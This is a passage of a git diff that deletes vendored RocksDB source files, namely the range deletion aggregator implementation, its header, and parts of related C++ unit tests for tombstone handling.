-    PutKey(db.get(), write_options, TestKey(3, 4), "v34");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    PutKey(db.get(), write_options, TestKey(1, 1), "v11");
-    PutKey(db.get(), write_options, TestKey(1, 3), "v13");
-    db->Flush(FlushOptions());
-    reinterpret_cast<DBImpl*>(db.get())->TEST_WaitForFlushMemTable();
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    iter->SeekToLast();
-    ASSERT_EQ(iter->value(), v14);
-  }
-}
-
-}  // end namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-  std::cout << kDbName << "\n";
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as HashSkipList and HashLinkList are not supported in "
-          "ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/range_del_aggregator.cc b/thirdparty/rocksdb/db/range_del_aggregator.cc
deleted file mode 100644
index c83f5a8..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator.cc
+++ /dev/null
@@ -1,520 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/range_del_aggregator.h"
-
-#include <algorithm>
-
-namespace rocksdb {
-
-RangeDelAggregator::RangeDelAggregator(
-    const InternalKeyComparator& icmp,
-    const std::vector<SequenceNumber>& snapshots,
-    bool collapse_deletions /* = true */)
-    : upper_bound_(kMaxSequenceNumber),
-      icmp_(icmp),
-      collapse_deletions_(collapse_deletions) {
-  InitRep(snapshots);
-}
-
-RangeDelAggregator::RangeDelAggregator(const InternalKeyComparator& icmp,
-                                       SequenceNumber snapshot,
-                                       bool collapse_deletions /* = false */)
-    : upper_bound_(snapshot),
-      icmp_(icmp),
-      collapse_deletions_(collapse_deletions) {}
-
-void RangeDelAggregator::InitRep(const std::vector<SequenceNumber>& snapshots) {
-  assert(rep_ == nullptr);
-  rep_.reset(new Rep());
-  for (auto snapshot : snapshots) {
-    rep_->stripe_map_.emplace(
-        snapshot,
-        PositionalTombstoneMap(TombstoneMap(
-            stl_wrappers::LessOfComparator(icmp_.user_comparator()))));
-  }
-  // Data newer than any snapshot falls in this catch-all stripe
-  rep_->stripe_map_.emplace(
-      kMaxSequenceNumber,
-      PositionalTombstoneMap(TombstoneMap(
-          stl_wrappers::LessOfComparator(icmp_.user_comparator()))));
-  rep_->pinned_iters_mgr_.StartPinning();
-}
-
-bool RangeDelAggregator::ShouldDelete(
-    const Slice& internal_key, RangeDelAggregator::RangePositioningMode mode) {
-  if (rep_ == nullptr) {
-    return false;
-  }
-  ParsedInternalKey parsed;
-  if (!ParseInternalKey(internal_key, &parsed)) {
-    assert(false);
-  }
-  return ShouldDelete(parsed, mode);
-}
-
-bool RangeDelAggregator::ShouldDelete(
-    const ParsedInternalKey& parsed,
-    RangeDelAggregator::RangePositioningMode mode) {
-  assert(IsValueType(parsed.type));
-  if (rep_ == nullptr) {
-    return false;
-  }
-  auto& positional_tombstone_map = GetPositionalTombstoneMap(parsed.sequence);
-  const auto& tombstone_map = positional_tombstone_map.raw_map;
-  if (tombstone_map.empty()) {
-    return false;
-  }
-  auto& tombstone_map_iter = positional_tombstone_map.iter;
-  if (tombstone_map_iter == tombstone_map.end() &&
-      (mode == kForwardTraversal || mode == kBackwardTraversal)) {
-    // invalid (e.g., if AddTombstones() changed the deletions), so need to
-    // reseek
-    mode = kBinarySearch;
-  }
-  switch (mode) {
-    case kFullScan:
-      assert(!collapse_deletions_);
-      // The maintained state (PositionalTombstoneMap::iter) isn't useful when
-      // we linear scan from the beginning each time, but we maintain it anyways
-      // for consistency.
-      tombstone_map_iter = tombstone_map.begin();
-      while (tombstone_map_iter != tombstone_map.end()) {
-        const auto& tombstone = tombstone_map_iter->second;
-        if (icmp_.user_comparator()->Compare(parsed.user_key,
-                                             tombstone.start_key_) < 0) {
-          break;
-        }
-        if (parsed.sequence < tombstone.seq_ &&
-            icmp_.user_comparator()->Compare(parsed.user_key,
-                                             tombstone.end_key_) < 0) {
-          return true;
-        }
-        ++tombstone_map_iter;
-      }
-      return false;
-    case kForwardTraversal:
-      assert(collapse_deletions_ && tombstone_map_iter != tombstone_map.end());
-      if (tombstone_map_iter == tombstone_map.begin() &&
-          icmp_.user_comparator()->Compare(parsed.user_key,
-                                           tombstone_map_iter->first) < 0) {
-        // before start of deletion intervals
-        return false;
-      }
-      while (std::next(tombstone_map_iter) != tombstone_map.end() &&
-             icmp_.user_comparator()->Compare(
-                 std::next(tombstone_map_iter)->first, parsed.user_key) <= 0) {
-        ++tombstone_map_iter;
-      }
-      break;
-    case kBackwardTraversal:
-      assert(collapse_deletions_ && tombstone_map_iter != tombstone_map.end());
-      while (tombstone_map_iter != tombstone_map.begin() &&
-             icmp_.user_comparator()->Compare(parsed.user_key,
-                                              tombstone_map_iter->first) < 0) {
-        --tombstone_map_iter;
-      }
-      if (tombstone_map_iter == tombstone_map.begin() &&
-          icmp_.user_comparator()->Compare(parsed.user_key,
-                                           tombstone_map_iter->first) < 0) {
-        // before start of deletion intervals
-        return false;
-      }
-      break;
-    case kBinarySearch:
-      assert(collapse_deletions_);
-      tombstone_map_iter =
-          tombstone_map.upper_bound(parsed.user_key);
-      if (tombstone_map_iter == tombstone_map.begin()) {
-        // before start of deletion intervals
-        return false;
-      }
-      --tombstone_map_iter;
-      break;
-  }
-  assert(mode != kFullScan);
-  assert(tombstone_map_iter != tombstone_map.end() &&
-         icmp_.user_comparator()->Compare(tombstone_map_iter->first,
-                                          parsed.user_key) <= 0);
-  assert(std::next(tombstone_map_iter) == tombstone_map.end() ||
-         icmp_.user_comparator()->Compare(
-             parsed.user_key, std::next(tombstone_map_iter)->first) < 0);
-  return parsed.sequence < tombstone_map_iter->second.seq_;
-}
-
-bool RangeDelAggregator::ShouldAddTombstones(
-    bool bottommost_level /* = false */) {
-  // TODO(andrewkr): can we just open a file and throw it away if it ends up
-  // empty after AddToBuilder()? This function doesn't take into subcompaction
-  // boundaries so isn't completely accurate.
-  if (rep_ == nullptr) {
-    return false;
-  }
-  auto stripe_map_iter = rep_->stripe_map_.begin();
-  assert(stripe_map_iter != rep_->stripe_map_.end());
-  if (bottommost_level) {
-    // For the bottommost level, keys covered by tombstones in the first
-    // (oldest) stripe have been compacted away, so the tombstones are obsolete.
-    ++stripe_map_iter;
-  }
-  while (stripe_map_iter != rep_->stripe_map_.end()) {
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      return true;
-    }
-    ++stripe_map_iter;
-  }
-  return false;
-}
-
-Status RangeDelAggregator::AddTombstones(
-    std::unique_ptr<InternalIterator> input) {
-  if (input == nullptr) {
-    return Status::OK();
-  }
-  input->SeekToFirst();
-  bool first_iter = true;
-  while (input->Valid()) {
-    if (first_iter) {
-      if (rep_ == nullptr) {
-        InitRep({upper_bound_});
-      } else {
-        InvalidateTombstoneMapPositions();
-      }
-      first_iter = false;
-    }
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(input->key(), &parsed_key)) {
-      return Status::Corruption("Unable to parse range tombstone InternalKey");
-    }
-    RangeTombstone tombstone(parsed_key, input->value());
-    AddTombstone(std::move(tombstone));
-    input->Next();
-  }
-  if (!first_iter) {
-    rep_->pinned_iters_mgr_.PinIterator(input.release(), false /* arena */);
-  }
-  return Status::OK();
-}
-
-void RangeDelAggregator::InvalidateTombstoneMapPositions() {
-  if (rep_ == nullptr) {
-    return;
-  }
-  for (auto stripe_map_iter = rep_->stripe_map_.begin();
-       stripe_map_iter != rep_->stripe_map_.end(); ++stripe_map_iter) {
-    stripe_map_iter->second.iter = stripe_map_iter->second.raw_map.end();
-  }
-}
-
-Status RangeDelAggregator::AddTombstone(RangeTombstone tombstone) {
-  auto& positional_tombstone_map = GetPositionalTombstoneMap(tombstone.seq_);
-  auto& tombstone_map = positional_tombstone_map.raw_map;
-  if (collapse_deletions_) {
-    // In collapsed mode, we only fill the seq_ field in the TombstoneMap's
-    // values. The end_key is unneeded because we assume the tombstone extends
-    // until the next tombstone starts. For gaps between real tombstones and
-    // for the last real tombstone, we denote end keys by inserting fake
-    // tombstones with sequence number zero.
-    std::vector<RangeTombstone> new_range_dels{
-        tombstone, RangeTombstone(tombstone.end_key_, Slice(), 0)};
-    auto new_range_dels_iter = new_range_dels.begin();
-    // Position at the first overlapping existing tombstone; if none exists,
-    // insert until we find an existing one overlapping a new point
-    const Slice* tombstone_map_begin = nullptr;
-    if (!tombstone_map.empty()) {
-      tombstone_map_begin = &tombstone_map.begin()->first;
-    }
-    auto last_range_dels_iter = new_range_dels_iter;
-    while (new_range_dels_iter != new_range_dels.end() &&
-           (tombstone_map_begin == nullptr ||
-            icmp_.user_comparator()->Compare(new_range_dels_iter->start_key_,
-                                             *tombstone_map_begin) < 0)) {
-      tombstone_map.emplace(
-          new_range_dels_iter->start_key_,
-          RangeTombstone(Slice(), Slice(), new_range_dels_iter->seq_));
-      last_range_dels_iter = new_range_dels_iter;
-      ++new_range_dels_iter;
-    }
-    if (new_range_dels_iter == new_range_dels.end()) {
-      return Status::OK();
-    }
-    // above loop advances one too far
-    new_range_dels_iter = last_range_dels_iter;
-    auto tombstone_map_iter =
-        tombstone_map.upper_bound(new_range_dels_iter->start_key_);
-    // if nothing overlapped we would've already inserted all the new points
-    // and returned early
-    assert(tombstone_map_iter != tombstone_map.begin());
-    tombstone_map_iter--;
-
-    // untermed_seq is non-kMaxSequenceNumber when we covered an existing point
-    // but haven't seen its corresponding endpoint. It's used for (1) deciding
-    // whether to forcibly insert the new interval's endpoint; and (2) possibly
-    // raising the seqnum for the to-be-inserted element (we insert the max
-    // seqnum between the next new interval and the unterminated interval).
-    SequenceNumber untermed_seq = kMaxSequenceNumber;
-    while (tombstone_map_iter != tombstone_map.end() &&
-           new_range_dels_iter != new_range_dels.end()) {
-      const Slice *tombstone_map_iter_end = nullptr,
-                  *new_range_dels_iter_end = nullptr;
-      if (tombstone_map_iter != tombstone_map.end()) {
-        auto next_tombstone_map_iter = std::next(tombstone_map_iter);
-        if (next_tombstone_map_iter != tombstone_map.end()) {
-          tombstone_map_iter_end = &next_tombstone_map_iter->first;
-        }
-      }
-      if (new_range_dels_iter != new_range_dels.end()) {
-        auto next_new_range_dels_iter = std::next(new_range_dels_iter);
-        if (next_new_range_dels_iter != new_range_dels.end()) {
-          new_range_dels_iter_end = &next_new_range_dels_iter->start_key_;
-        }
-      }
-
-      // our positions in existing/new tombstone collections should always
-      // overlap. The non-overlapping cases are handled above and below this
-      // loop.
-      assert(new_range_dels_iter_end == nullptr ||
-             icmp_.user_comparator()->Compare(tombstone_map_iter->first,
-                                              *new_range_dels_iter_end) < 0);
-      assert(tombstone_map_iter_end == nullptr ||
-             icmp_.user_comparator()->Compare(new_range_dels_iter->start_key_,
-                                              *tombstone_map_iter_end) < 0);
-
-      int new_to_old_start_cmp = icmp_.user_comparator()->Compare(
-          new_range_dels_iter->start_key_, tombstone_map_iter->first);
-      // nullptr end means extends infinitely rightwards, set new_to_old_end_cmp
-      // accordingly so we can use common code paths later.
-      int new_to_old_end_cmp;
-      if (new_range_dels_iter_end == nullptr &&
-          tombstone_map_iter_end == nullptr) {
-        new_to_old_end_cmp = 0;
-      } else if (new_range_dels_iter_end == nullptr) {
-        new_to_old_end_cmp = 1;
-      } else if (tombstone_map_iter_end == nullptr) {
-        new_to_old_end_cmp = -1;
-      } else {
-        new_to_old_end_cmp = icmp_.user_comparator()->Compare(
-            *new_range_dels_iter_end, *tombstone_map_iter_end);
-      }
-
-      if (new_to_old_start_cmp < 0) {
-        // the existing one's left endpoint comes after, so raise/delete it if
-        // it's covered.
-        if (tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          untermed_seq = tombstone_map_iter->second.seq_;
-          if (tombstone_map_iter != tombstone_map.begin() &&
-              std::prev(tombstone_map_iter)->second.seq_ ==
-                  new_range_dels_iter->seq_) {
-            tombstone_map_iter = tombstone_map.erase(tombstone_map_iter);
-            --tombstone_map_iter;
-          } else {
-            tombstone_map_iter->second.seq_ = new_range_dels_iter->seq_;
-          }
-        }
-      } else if (new_to_old_start_cmp > 0) {
-        if (untermed_seq != kMaxSequenceNumber ||
-            tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          auto seq = tombstone_map_iter->second.seq_;
-          // need to adjust this element if not intended to span beyond the new
-          // element (i.e., was_tombstone_map_iter_raised == true), or if it
-          // can be raised
-          tombstone_map_iter = tombstone_map.emplace(
-              new_range_dels_iter->start_key_,
-              RangeTombstone(
-                  Slice(), Slice(),
-                  std::max(
-                      untermed_seq == kMaxSequenceNumber ? 0 : untermed_seq,
-                      new_range_dels_iter->seq_)));
-          untermed_seq = seq;
-        }
-      } else {
-        // their left endpoints coincide, so raise the existing one if needed
-        if (tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          untermed_seq = tombstone_map_iter->second.seq_;
-          tombstone_map_iter->second.seq_ = new_range_dels_iter->seq_;
-        }
-      }
-
-      // advance whichever one ends earlier, or both if their right endpoints
-      // coincide
-      if (new_to_old_end_cmp < 0) {
-        ++new_range_dels_iter;
-      } else if (new_to_old_end_cmp > 0) {
-        ++tombstone_map_iter;
-        untermed_seq = kMaxSequenceNumber;
-      } else {
-        ++new_range_dels_iter;
-        ++tombstone_map_iter;
-        untermed_seq = kMaxSequenceNumber;
-      }
-    }
-    while (new_range_dels_iter != new_range_dels.end()) {
-      tombstone_map.emplace(
-          new_range_dels_iter->start_key_,
-          RangeTombstone(Slice(), Slice(), new_range_dels_iter->seq_));
-      ++new_range_dels_iter;
-    }
-  } else {
-    auto start_key = tombstone.start_key_;
-    tombstone_map.emplace(start_key, std::move(tombstone));
-  }
-  return Status::OK();
-}
-
-RangeDelAggregator::PositionalTombstoneMap&
-RangeDelAggregator::GetPositionalTombstoneMap(SequenceNumber seq) {
-  assert(rep_ != nullptr);
-  // The stripe includes seqnum for the snapshot above and excludes seqnum for
-  // the snapshot below.
-  StripeMap::iterator iter;
-  if (seq > 0) {
-    // upper_bound() checks strict inequality so need to subtract one
-    iter = rep_->stripe_map_.upper_bound(seq - 1);
-  } else {
-    iter = rep_->stripe_map_.begin();
-  }
-  // catch-all stripe justifies this assertion in either of above cases
-  assert(iter != rep_->stripe_map_.end());
-  return iter->second;
-}
-
-// TODO(andrewkr): We should implement an iterator over range tombstones in our
-// map. It'd enable compaction to open tables on-demand, i.e., only once range
-// tombstones are known to be available, without the code duplication we have
-// in ShouldAddTombstones(). It'll also allow us to move the table-modifying
-// code into more coherent places: CompactionJob and BuildTable().
-void RangeDelAggregator::AddToBuilder(
-    TableBuilder* builder, const Slice* lower_bound, const Slice* upper_bound,
-    FileMetaData* meta,
-    CompactionIterationStats* range_del_out_stats /* = nullptr */,
-    bool bottommost_level /* = false */) {
-  if (rep_ == nullptr) {
-    return;
-  }
-  auto stripe_map_iter = rep_->stripe_map_.begin();
-  assert(stripe_map_iter != rep_->stripe_map_.end());
-  if (bottommost_level) {
-    // TODO(andrewkr): these are counted for each compaction output file, so
-    // lots of double-counting.
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      range_del_out_stats->num_range_del_drop_obsolete +=
-          static_cast<int64_t>(stripe_map_iter->second.raw_map.size()) -
-          (collapse_deletions_ ? 1 : 0);
-      range_del_out_stats->num_record_drop_obsolete +=
-          static_cast<int64_t>(stripe_map_iter->second.raw_map.size()) -
-          (collapse_deletions_ ? 1 : 0);
-    }
-    // For the bottommost level, keys covered by tombstones in the first
-    // (oldest) stripe have been compacted away, so the tombstones are obsolete.
-    ++stripe_map_iter;
-  }
-
-  // Note the order in which tombstones are stored is insignificant since we
-  // insert them into a std::map on the read path.
-  while (stripe_map_iter != rep_->stripe_map_.end()) {
-    bool first_added = false;
-    for (auto tombstone_map_iter = stripe_map_iter->second.raw_map.begin();
-         tombstone_map_iter != stripe_map_iter->second.raw_map.end();
-         ++tombstone_map_iter) {
-      RangeTombstone tombstone;
-      if (collapse_deletions_) {
-        auto next_tombstone_map_iter = std::next(tombstone_map_iter);
-        if (next_tombstone_map_iter == stripe_map_iter->second.raw_map.end() ||
-            tombstone_map_iter->second.seq_ == 0) {
-          // it's a sentinel tombstone
-          continue;
-        }
-        tombstone.start_key_ = tombstone_map_iter->first;
-        tombstone.end_key_ = next_tombstone_map_iter->first;
-        tombstone.seq_ = tombstone_map_iter->second.seq_;
-      } else {
-        tombstone = tombstone_map_iter->second;
-      }
-      if (upper_bound != nullptr &&
-          icmp_.user_comparator()->Compare(*upper_bound,
-                                           tombstone.start_key_) <= 0) {
-        // Tombstones starting at upper_bound or later only need to be included
-        // in the next table. Break because subsequent tombstones will start
-        // even later.
-        break;
-      }
-      if (lower_bound != nullptr &&
-          icmp_.user_comparator()->Compare(tombstone.end_key_,
-                                           *lower_bound) <= 0) {
-        // Tombstones ending before or at lower_bound only need to be included
-        // in the prev table. Continue because subsequent tombstones may still
-        // overlap [lower_bound, upper_bound).
-        continue;
-      }
-
-      auto ikey_and_end_key = tombstone.Serialize();
-      builder->Add(ikey_and_end_key.first.Encode(), ikey_and_end_key.second);
-      if (!first_added) {
-        first_added = true;
-        InternalKey smallest_candidate = std::move(ikey_and_end_key.first);
-        if (lower_bound != nullptr &&
-            icmp_.user_comparator()->Compare(smallest_candidate.user_key(),
-                                             *lower_bound) <= 0) {
-          // Pretend the smallest key has the same user key as lower_bound
-          // (the max key in the previous table or subcompaction) in order for
-          // files to appear key-space partitioned.
-          //
-          // Choose lowest seqnum so this file's smallest internal key comes
-          // after the previous file's/subcompaction's largest. The fake seqnum
-          // is OK because the read path's file-picking code only considers user
-          // key.
-          smallest_candidate = InternalKey(*lower_bound, 0, kTypeRangeDeletion);
-        }
-        if (meta->smallest.size() == 0 ||
-            icmp_.Compare(smallest_candidate, meta->smallest) < 0) {
-          meta->smallest = std::move(smallest_candidate);
-        }
-      }
-      InternalKey largest_candidate = tombstone.SerializeEndKey();
-      if (upper_bound != nullptr &&
-          icmp_.user_comparator()->Compare(*upper_bound,
-                                           largest_candidate.user_key()) <= 0) {
-        // Pretend the largest key has the same user key as upper_bound (the
-        // min key in the following table or subcompaction) in order for files
-        // to appear key-space partitioned.
-        //
-        // Choose highest seqnum so this file's largest internal key comes
-        // before the next file's/subcompaction's smallest. The fake seqnum is
-        // OK because the read path's file-picking code only considers the user
-        // key portion.
-        //
-        // Note Seek() also creates InternalKey with (user_key,
-        // kMaxSequenceNumber), but with kTypeDeletion (0x7) instead of
-        // kTypeRangeDeletion (0xF), so the range tombstone comes before the
-        // Seek() key in InternalKey's ordering. So Seek() will look in the
-        // next file for the user key.
-        largest_candidate = InternalKey(*upper_bound, kMaxSequenceNumber,
-                                        kTypeRangeDeletion);
-      }
-      if (meta->largest.size() == 0 ||
-          icmp_.Compare(meta->largest, largest_candidate) < 0) {
-        meta->largest = std::move(largest_candidate);
-      }
-      meta->smallest_seqno = std::min(meta->smallest_seqno, tombstone.seq_);
-      meta->largest_seqno = std::max(meta->largest_seqno, tombstone.seq_);
-    }
-    ++stripe_map_iter;
-  }
-}
-
-bool RangeDelAggregator::IsEmpty() {
-  if (rep_ == nullptr) {
-    return true;
-  }
-  for (auto stripe_map_iter = rep_->stripe_map_.begin();
-       stripe_map_iter != rep_->stripe_map_.end(); ++stripe_map_iter) {
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      return false;
-    }
-  }
-  return true;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/range_del_aggregator.h b/thirdparty/rocksdb/db/range_del_aggregator.h
deleted file mode 100644
index 9d4b8ca..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator.h
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "db/compaction_iteration_stats.h"
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/version_edit.h"
-#include "include/rocksdb/comparator.h"
-#include "include/rocksdb/types.h"
-#include "table/internal_iterator.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/table_builder.h"
-#include "util/kv_map.h"
-
-namespace rocksdb {
-
-// A RangeDelAggregator aggregates range deletion tombstones as they are
-// encountered in memtables/SST files. It provides methods that check whether a
-// key is covered by range tombstones or write the relevant tombstones to a new
-// SST file.
-class RangeDelAggregator {
- public:
-  // @param snapshots These are used to organize the tombstones into snapshot
-  //    stripes, which is the seqnum range between consecutive snapshots,
-  //    including the higher snapshot and excluding the lower one. Currently,
-  //    this is used by ShouldDelete() to prevent deletion of keys that are
-  //    covered by range tombstones in other snapshot stripes. This constructor
-  //    is used for writes (flush/compaction). All DB snapshots are provided
-  //    such that no keys are removed that are uncovered according to any DB
-  //    snapshot.
-  // Note this overload does not lazily initialize Rep.
-  RangeDelAggregator(const InternalKeyComparator& icmp,
-                     const std::vector<SequenceNumber>& snapshots,
-                     bool collapse_deletions = true);
-
-  // @param upper_bound Similar to snapshots above, except with a single
-  //    snapshot, which allows us to store the snapshot on the stack and defer
-  //    initialization of heap-allocating members (in Rep) until the first range
-  //    deletion is encountered. This constructor is used in case of reads (get/
-  //    iterator), for which only the user snapshot (upper_bound) is provided
-  //    such that the seqnum space is divided into two stripes. Only the older
-  //    stripe will be used by ShouldDelete().
-  RangeDelAggregator(const InternalKeyComparator& icmp,
-                     SequenceNumber upper_bound,
-                     bool collapse_deletions = false);
-
-  // We maintain position in the tombstone map across calls to ShouldDelete. The
-  // caller may wish to specify a mode to optimize positioning the iterator
-  // during the next call to ShouldDelete. The non-kFullScan modes are only
-  // available when deletion collapsing is enabled.
-  //
-  // For example, if we invoke Next() on an iterator, kForwardTraversal should
-  // be specified to advance one-by-one through deletions until one is found
-  // with its interval containing the key. This will typically be faster than
-  // doing a full binary search (kBinarySearch).
-  enum RangePositioningMode {
-    kFullScan,  // used iff collapse_deletions_ == false
-    kForwardTraversal,
-    kBackwardTraversal,
-    kBinarySearch,
-  };
-
-  // Returns whether the key should be deleted, which is the case when it is
-  // covered by a range tombstone residing in the same snapshot stripe.
-  // @param mode If collapse_deletions_ is true, this dictates how we will find
-  //             the deletion whose interval contains this key. Otherwise, its
-  //             value must be kFullScan indicating linear scan from beginning..
-  bool ShouldDelete(const ParsedInternalKey& parsed,
-                    RangePositioningMode mode = kFullScan);
-  bool ShouldDelete(const Slice& internal_key,
-                    RangePositioningMode mode = kFullScan);
-  bool ShouldAddTombstones(bool bottommost_level = false);
-
-  // Adds tombstones to the tombstone aggregation structure maintained by this
-  // object.
-  // @return non-OK status if any of the tombstone keys are corrupted.
-  Status AddTombstones(std::unique_ptr<InternalIterator> input);
-
-  // Resets iterators maintained across calls to ShouldDelete(). This may be
-  // called when the tombstones change, or the owner may call explicitly, e.g.,
-  // if it's an iterator that just seeked to an arbitrary position. The effect
-  // of invalidation is that the following call to ShouldDelete() will binary
-  // search for its tombstone.
-  void InvalidateTombstoneMapPositions();
-
-  // Writes tombstones covering a range to a table builder.
-  // @param extend_before_min_key If true, the range of tombstones to be added
-  //    to the TableBuilder starts from the beginning of the key-range;
-  //    otherwise, it starts from meta->smallest.
-  // @param lower_bound/upper_bound Any range deletion with [start_key, end_key)
-  //    that overlaps the target range [*lower_bound, *upper_bound) is added to
-  //    the builder. If lower_bound is nullptr, the target range extends
-  //    infinitely to the left. If upper_bound is nullptr, the target range
-  //    extends infinitely to the right. If both are nullptr, the target range
-  //    extends infinitely in both directions, i.e., all range deletions are
-  //    added to the builder.
-  // @param meta The file's metadata. We modify the begin and end keys according
-  //    to the range tombstones added to this file such that the read path does
-  //    not miss range tombstones that cover gaps before/after/between files in
-  //    a level. lower_bound/upper_bound above constrain how far file boundaries
-  //    can be extended.
-  // @param bottommost_level If true, we will filter out any tombstones
-  //    belonging to the oldest snapshot stripe, because all keys potentially
-  //    covered by this tombstone are guaranteed to have been deleted by
-  //    compaction.
-  void AddToBuilder(TableBuilder* builder, const Slice* lower_bound,
-                    const Slice* upper_bound, FileMetaData* meta,
-                    CompactionIterationStats* range_del_out_stats = nullptr,
-                    bool bottommost_level = false);
-  bool IsEmpty();
-
- private:
-  // Maps tombstone user start key -> tombstone object
-  typedef std::multimap<Slice, RangeTombstone, stl_wrappers::LessOfComparator>
-      TombstoneMap;
-  // Also maintains position in TombstoneMap last seen by ShouldDelete(). The
-  // end iterator indicates invalidation (e.g., if AddTombstones() changes the
-  // underlying map). End iterator cannot be invalidated.
-  struct PositionalTombstoneMap {
-    explicit PositionalTombstoneMap(TombstoneMap _raw_map)
-        : raw_map(std::move(_raw_map)), iter(raw_map.end()) {}
-    PositionalTombstoneMap(const PositionalTombstoneMap&) = delete;
-    PositionalTombstoneMap(PositionalTombstoneMap&& other)
-        : raw_map(std::move(other.raw_map)), iter(raw_map.end()) {}
-
-    TombstoneMap raw_map;
-    TombstoneMap::const_iterator iter;
-  };
-
-  // Maps snapshot seqnum -> map of tombstones that fall in that stripe, i.e.,
-  // their seqnums are greater than the next smaller snapshot's seqnum.
-  typedef std::map<SequenceNumber, PositionalTombstoneMap> StripeMap;
-
-  struct Rep {
-    StripeMap stripe_map_;
-    PinnedIteratorsManager pinned_iters_mgr_;
-  };
-  // Initializes rep_ lazily. This aggregator object is constructed for every
-  // read, so expensive members should only be created when necessary, i.e.,
-  // once the first range deletion is encountered.
-  void InitRep(const std::vector<SequenceNumber>& snapshots);
-
-  PositionalTombstoneMap& GetPositionalTombstoneMap(SequenceNumber seq);
-  Status AddTombstone(RangeTombstone tombstone);
-
-  SequenceNumber upper_bound_;
-  std::unique_ptr<Rep> rep_;
-  const InternalKeyComparator& icmp_;
-  // collapse range deletions so they're binary searchable
-  const bool collapse_deletions_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/range_del_aggregator_test.cc b/thirdparty/rocksdb/db/range_del_aggregator_test.cc
deleted file mode 100644
index 39029bd..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator_test.cc
+++ /dev/null
@@ -1,157 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-
-#include "db/db_test_util.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/comparator.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class RangeDelAggregatorTest : public testing::Test {};
-
-namespace {
-
-struct ExpectedPoint {
-  Slice begin;
-  SequenceNumber seq;
-};
-
-enum Direction {
-  kForward,
-  kReverse,
-};
-
-void VerifyRangeDels(const std::vector<RangeTombstone>& range_dels,
-                     const std::vector<ExpectedPoint>& expected_points) {
-  // Test same result regardless of which order the range deletions are added.
-  for (Direction dir : {kForward, kReverse}) {
-    auto icmp = InternalKeyComparator(BytewiseComparator());
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */, true);
-    std::vector<std::string> keys, values;
-    for (const auto& range_del : range_dels) {
-      auto key_and_value = range_del.Serialize();
-      keys.push_back(key_and_value.first.Encode().ToString());
-      values.push_back(key_and_value.second.ToString());
-    }
-    if (dir == kReverse) {
-      std::reverse(keys.begin(), keys.end());
-      std::reverse(values.begin(), values.end());
-    }
-    std::unique_ptr<test::VectorIterator> range_del_iter(
-        new test::VectorIterator(keys, values));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-
-    for (const auto expected_point : expected_points) {
-      ParsedInternalKey parsed_key;
-      parsed_key.user_key = expected_point.begin;
-      parsed_key.sequence = expected_point.seq;
-      parsed_key.type = kTypeValue;
-      ASSERT_FALSE(range_del_agg.ShouldDelete(
-          parsed_key,
-          RangeDelAggregator::RangePositioningMode::kForwardTraversal));
-      if (parsed_key.sequence > 0) {
-        --parsed_key.sequence;
-        ASSERT_TRUE(range_del_agg.ShouldDelete(
-            parsed_key,
-            RangeDelAggregator::RangePositioningMode::kForwardTraversal));
-      }
-    }
-  }
-}
-
-}  // anonymous namespace
-
-TEST_F(RangeDelAggregatorTest, Empty) { VerifyRangeDels({}, {{"a", 0}}); }
-
-TEST_F(RangeDelAggregatorTest, SameStartAndEnd) {
-  VerifyRangeDels({{"a", "a", 5}}, {{" ", 0}, {"a", 0}, {"b", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, Single) {
-  VerifyRangeDels({{"a", "b", 10}}, {{" ", 0}, {"a", 10}, {"b", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveLeft) {
-  VerifyRangeDels({{"a", "c", 10}, {"b", "d", 5}},
-                  {{" ", 0}, {"a", 10}, {"c", 5}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveRight) {
-  VerifyRangeDels({{"a", "c", 5}, {"b", "d", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveMiddle) {
-  VerifyRangeDels({{"a", "d", 5}, {"b", "c", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"c", 5}, {"d", 0}});
-}
-
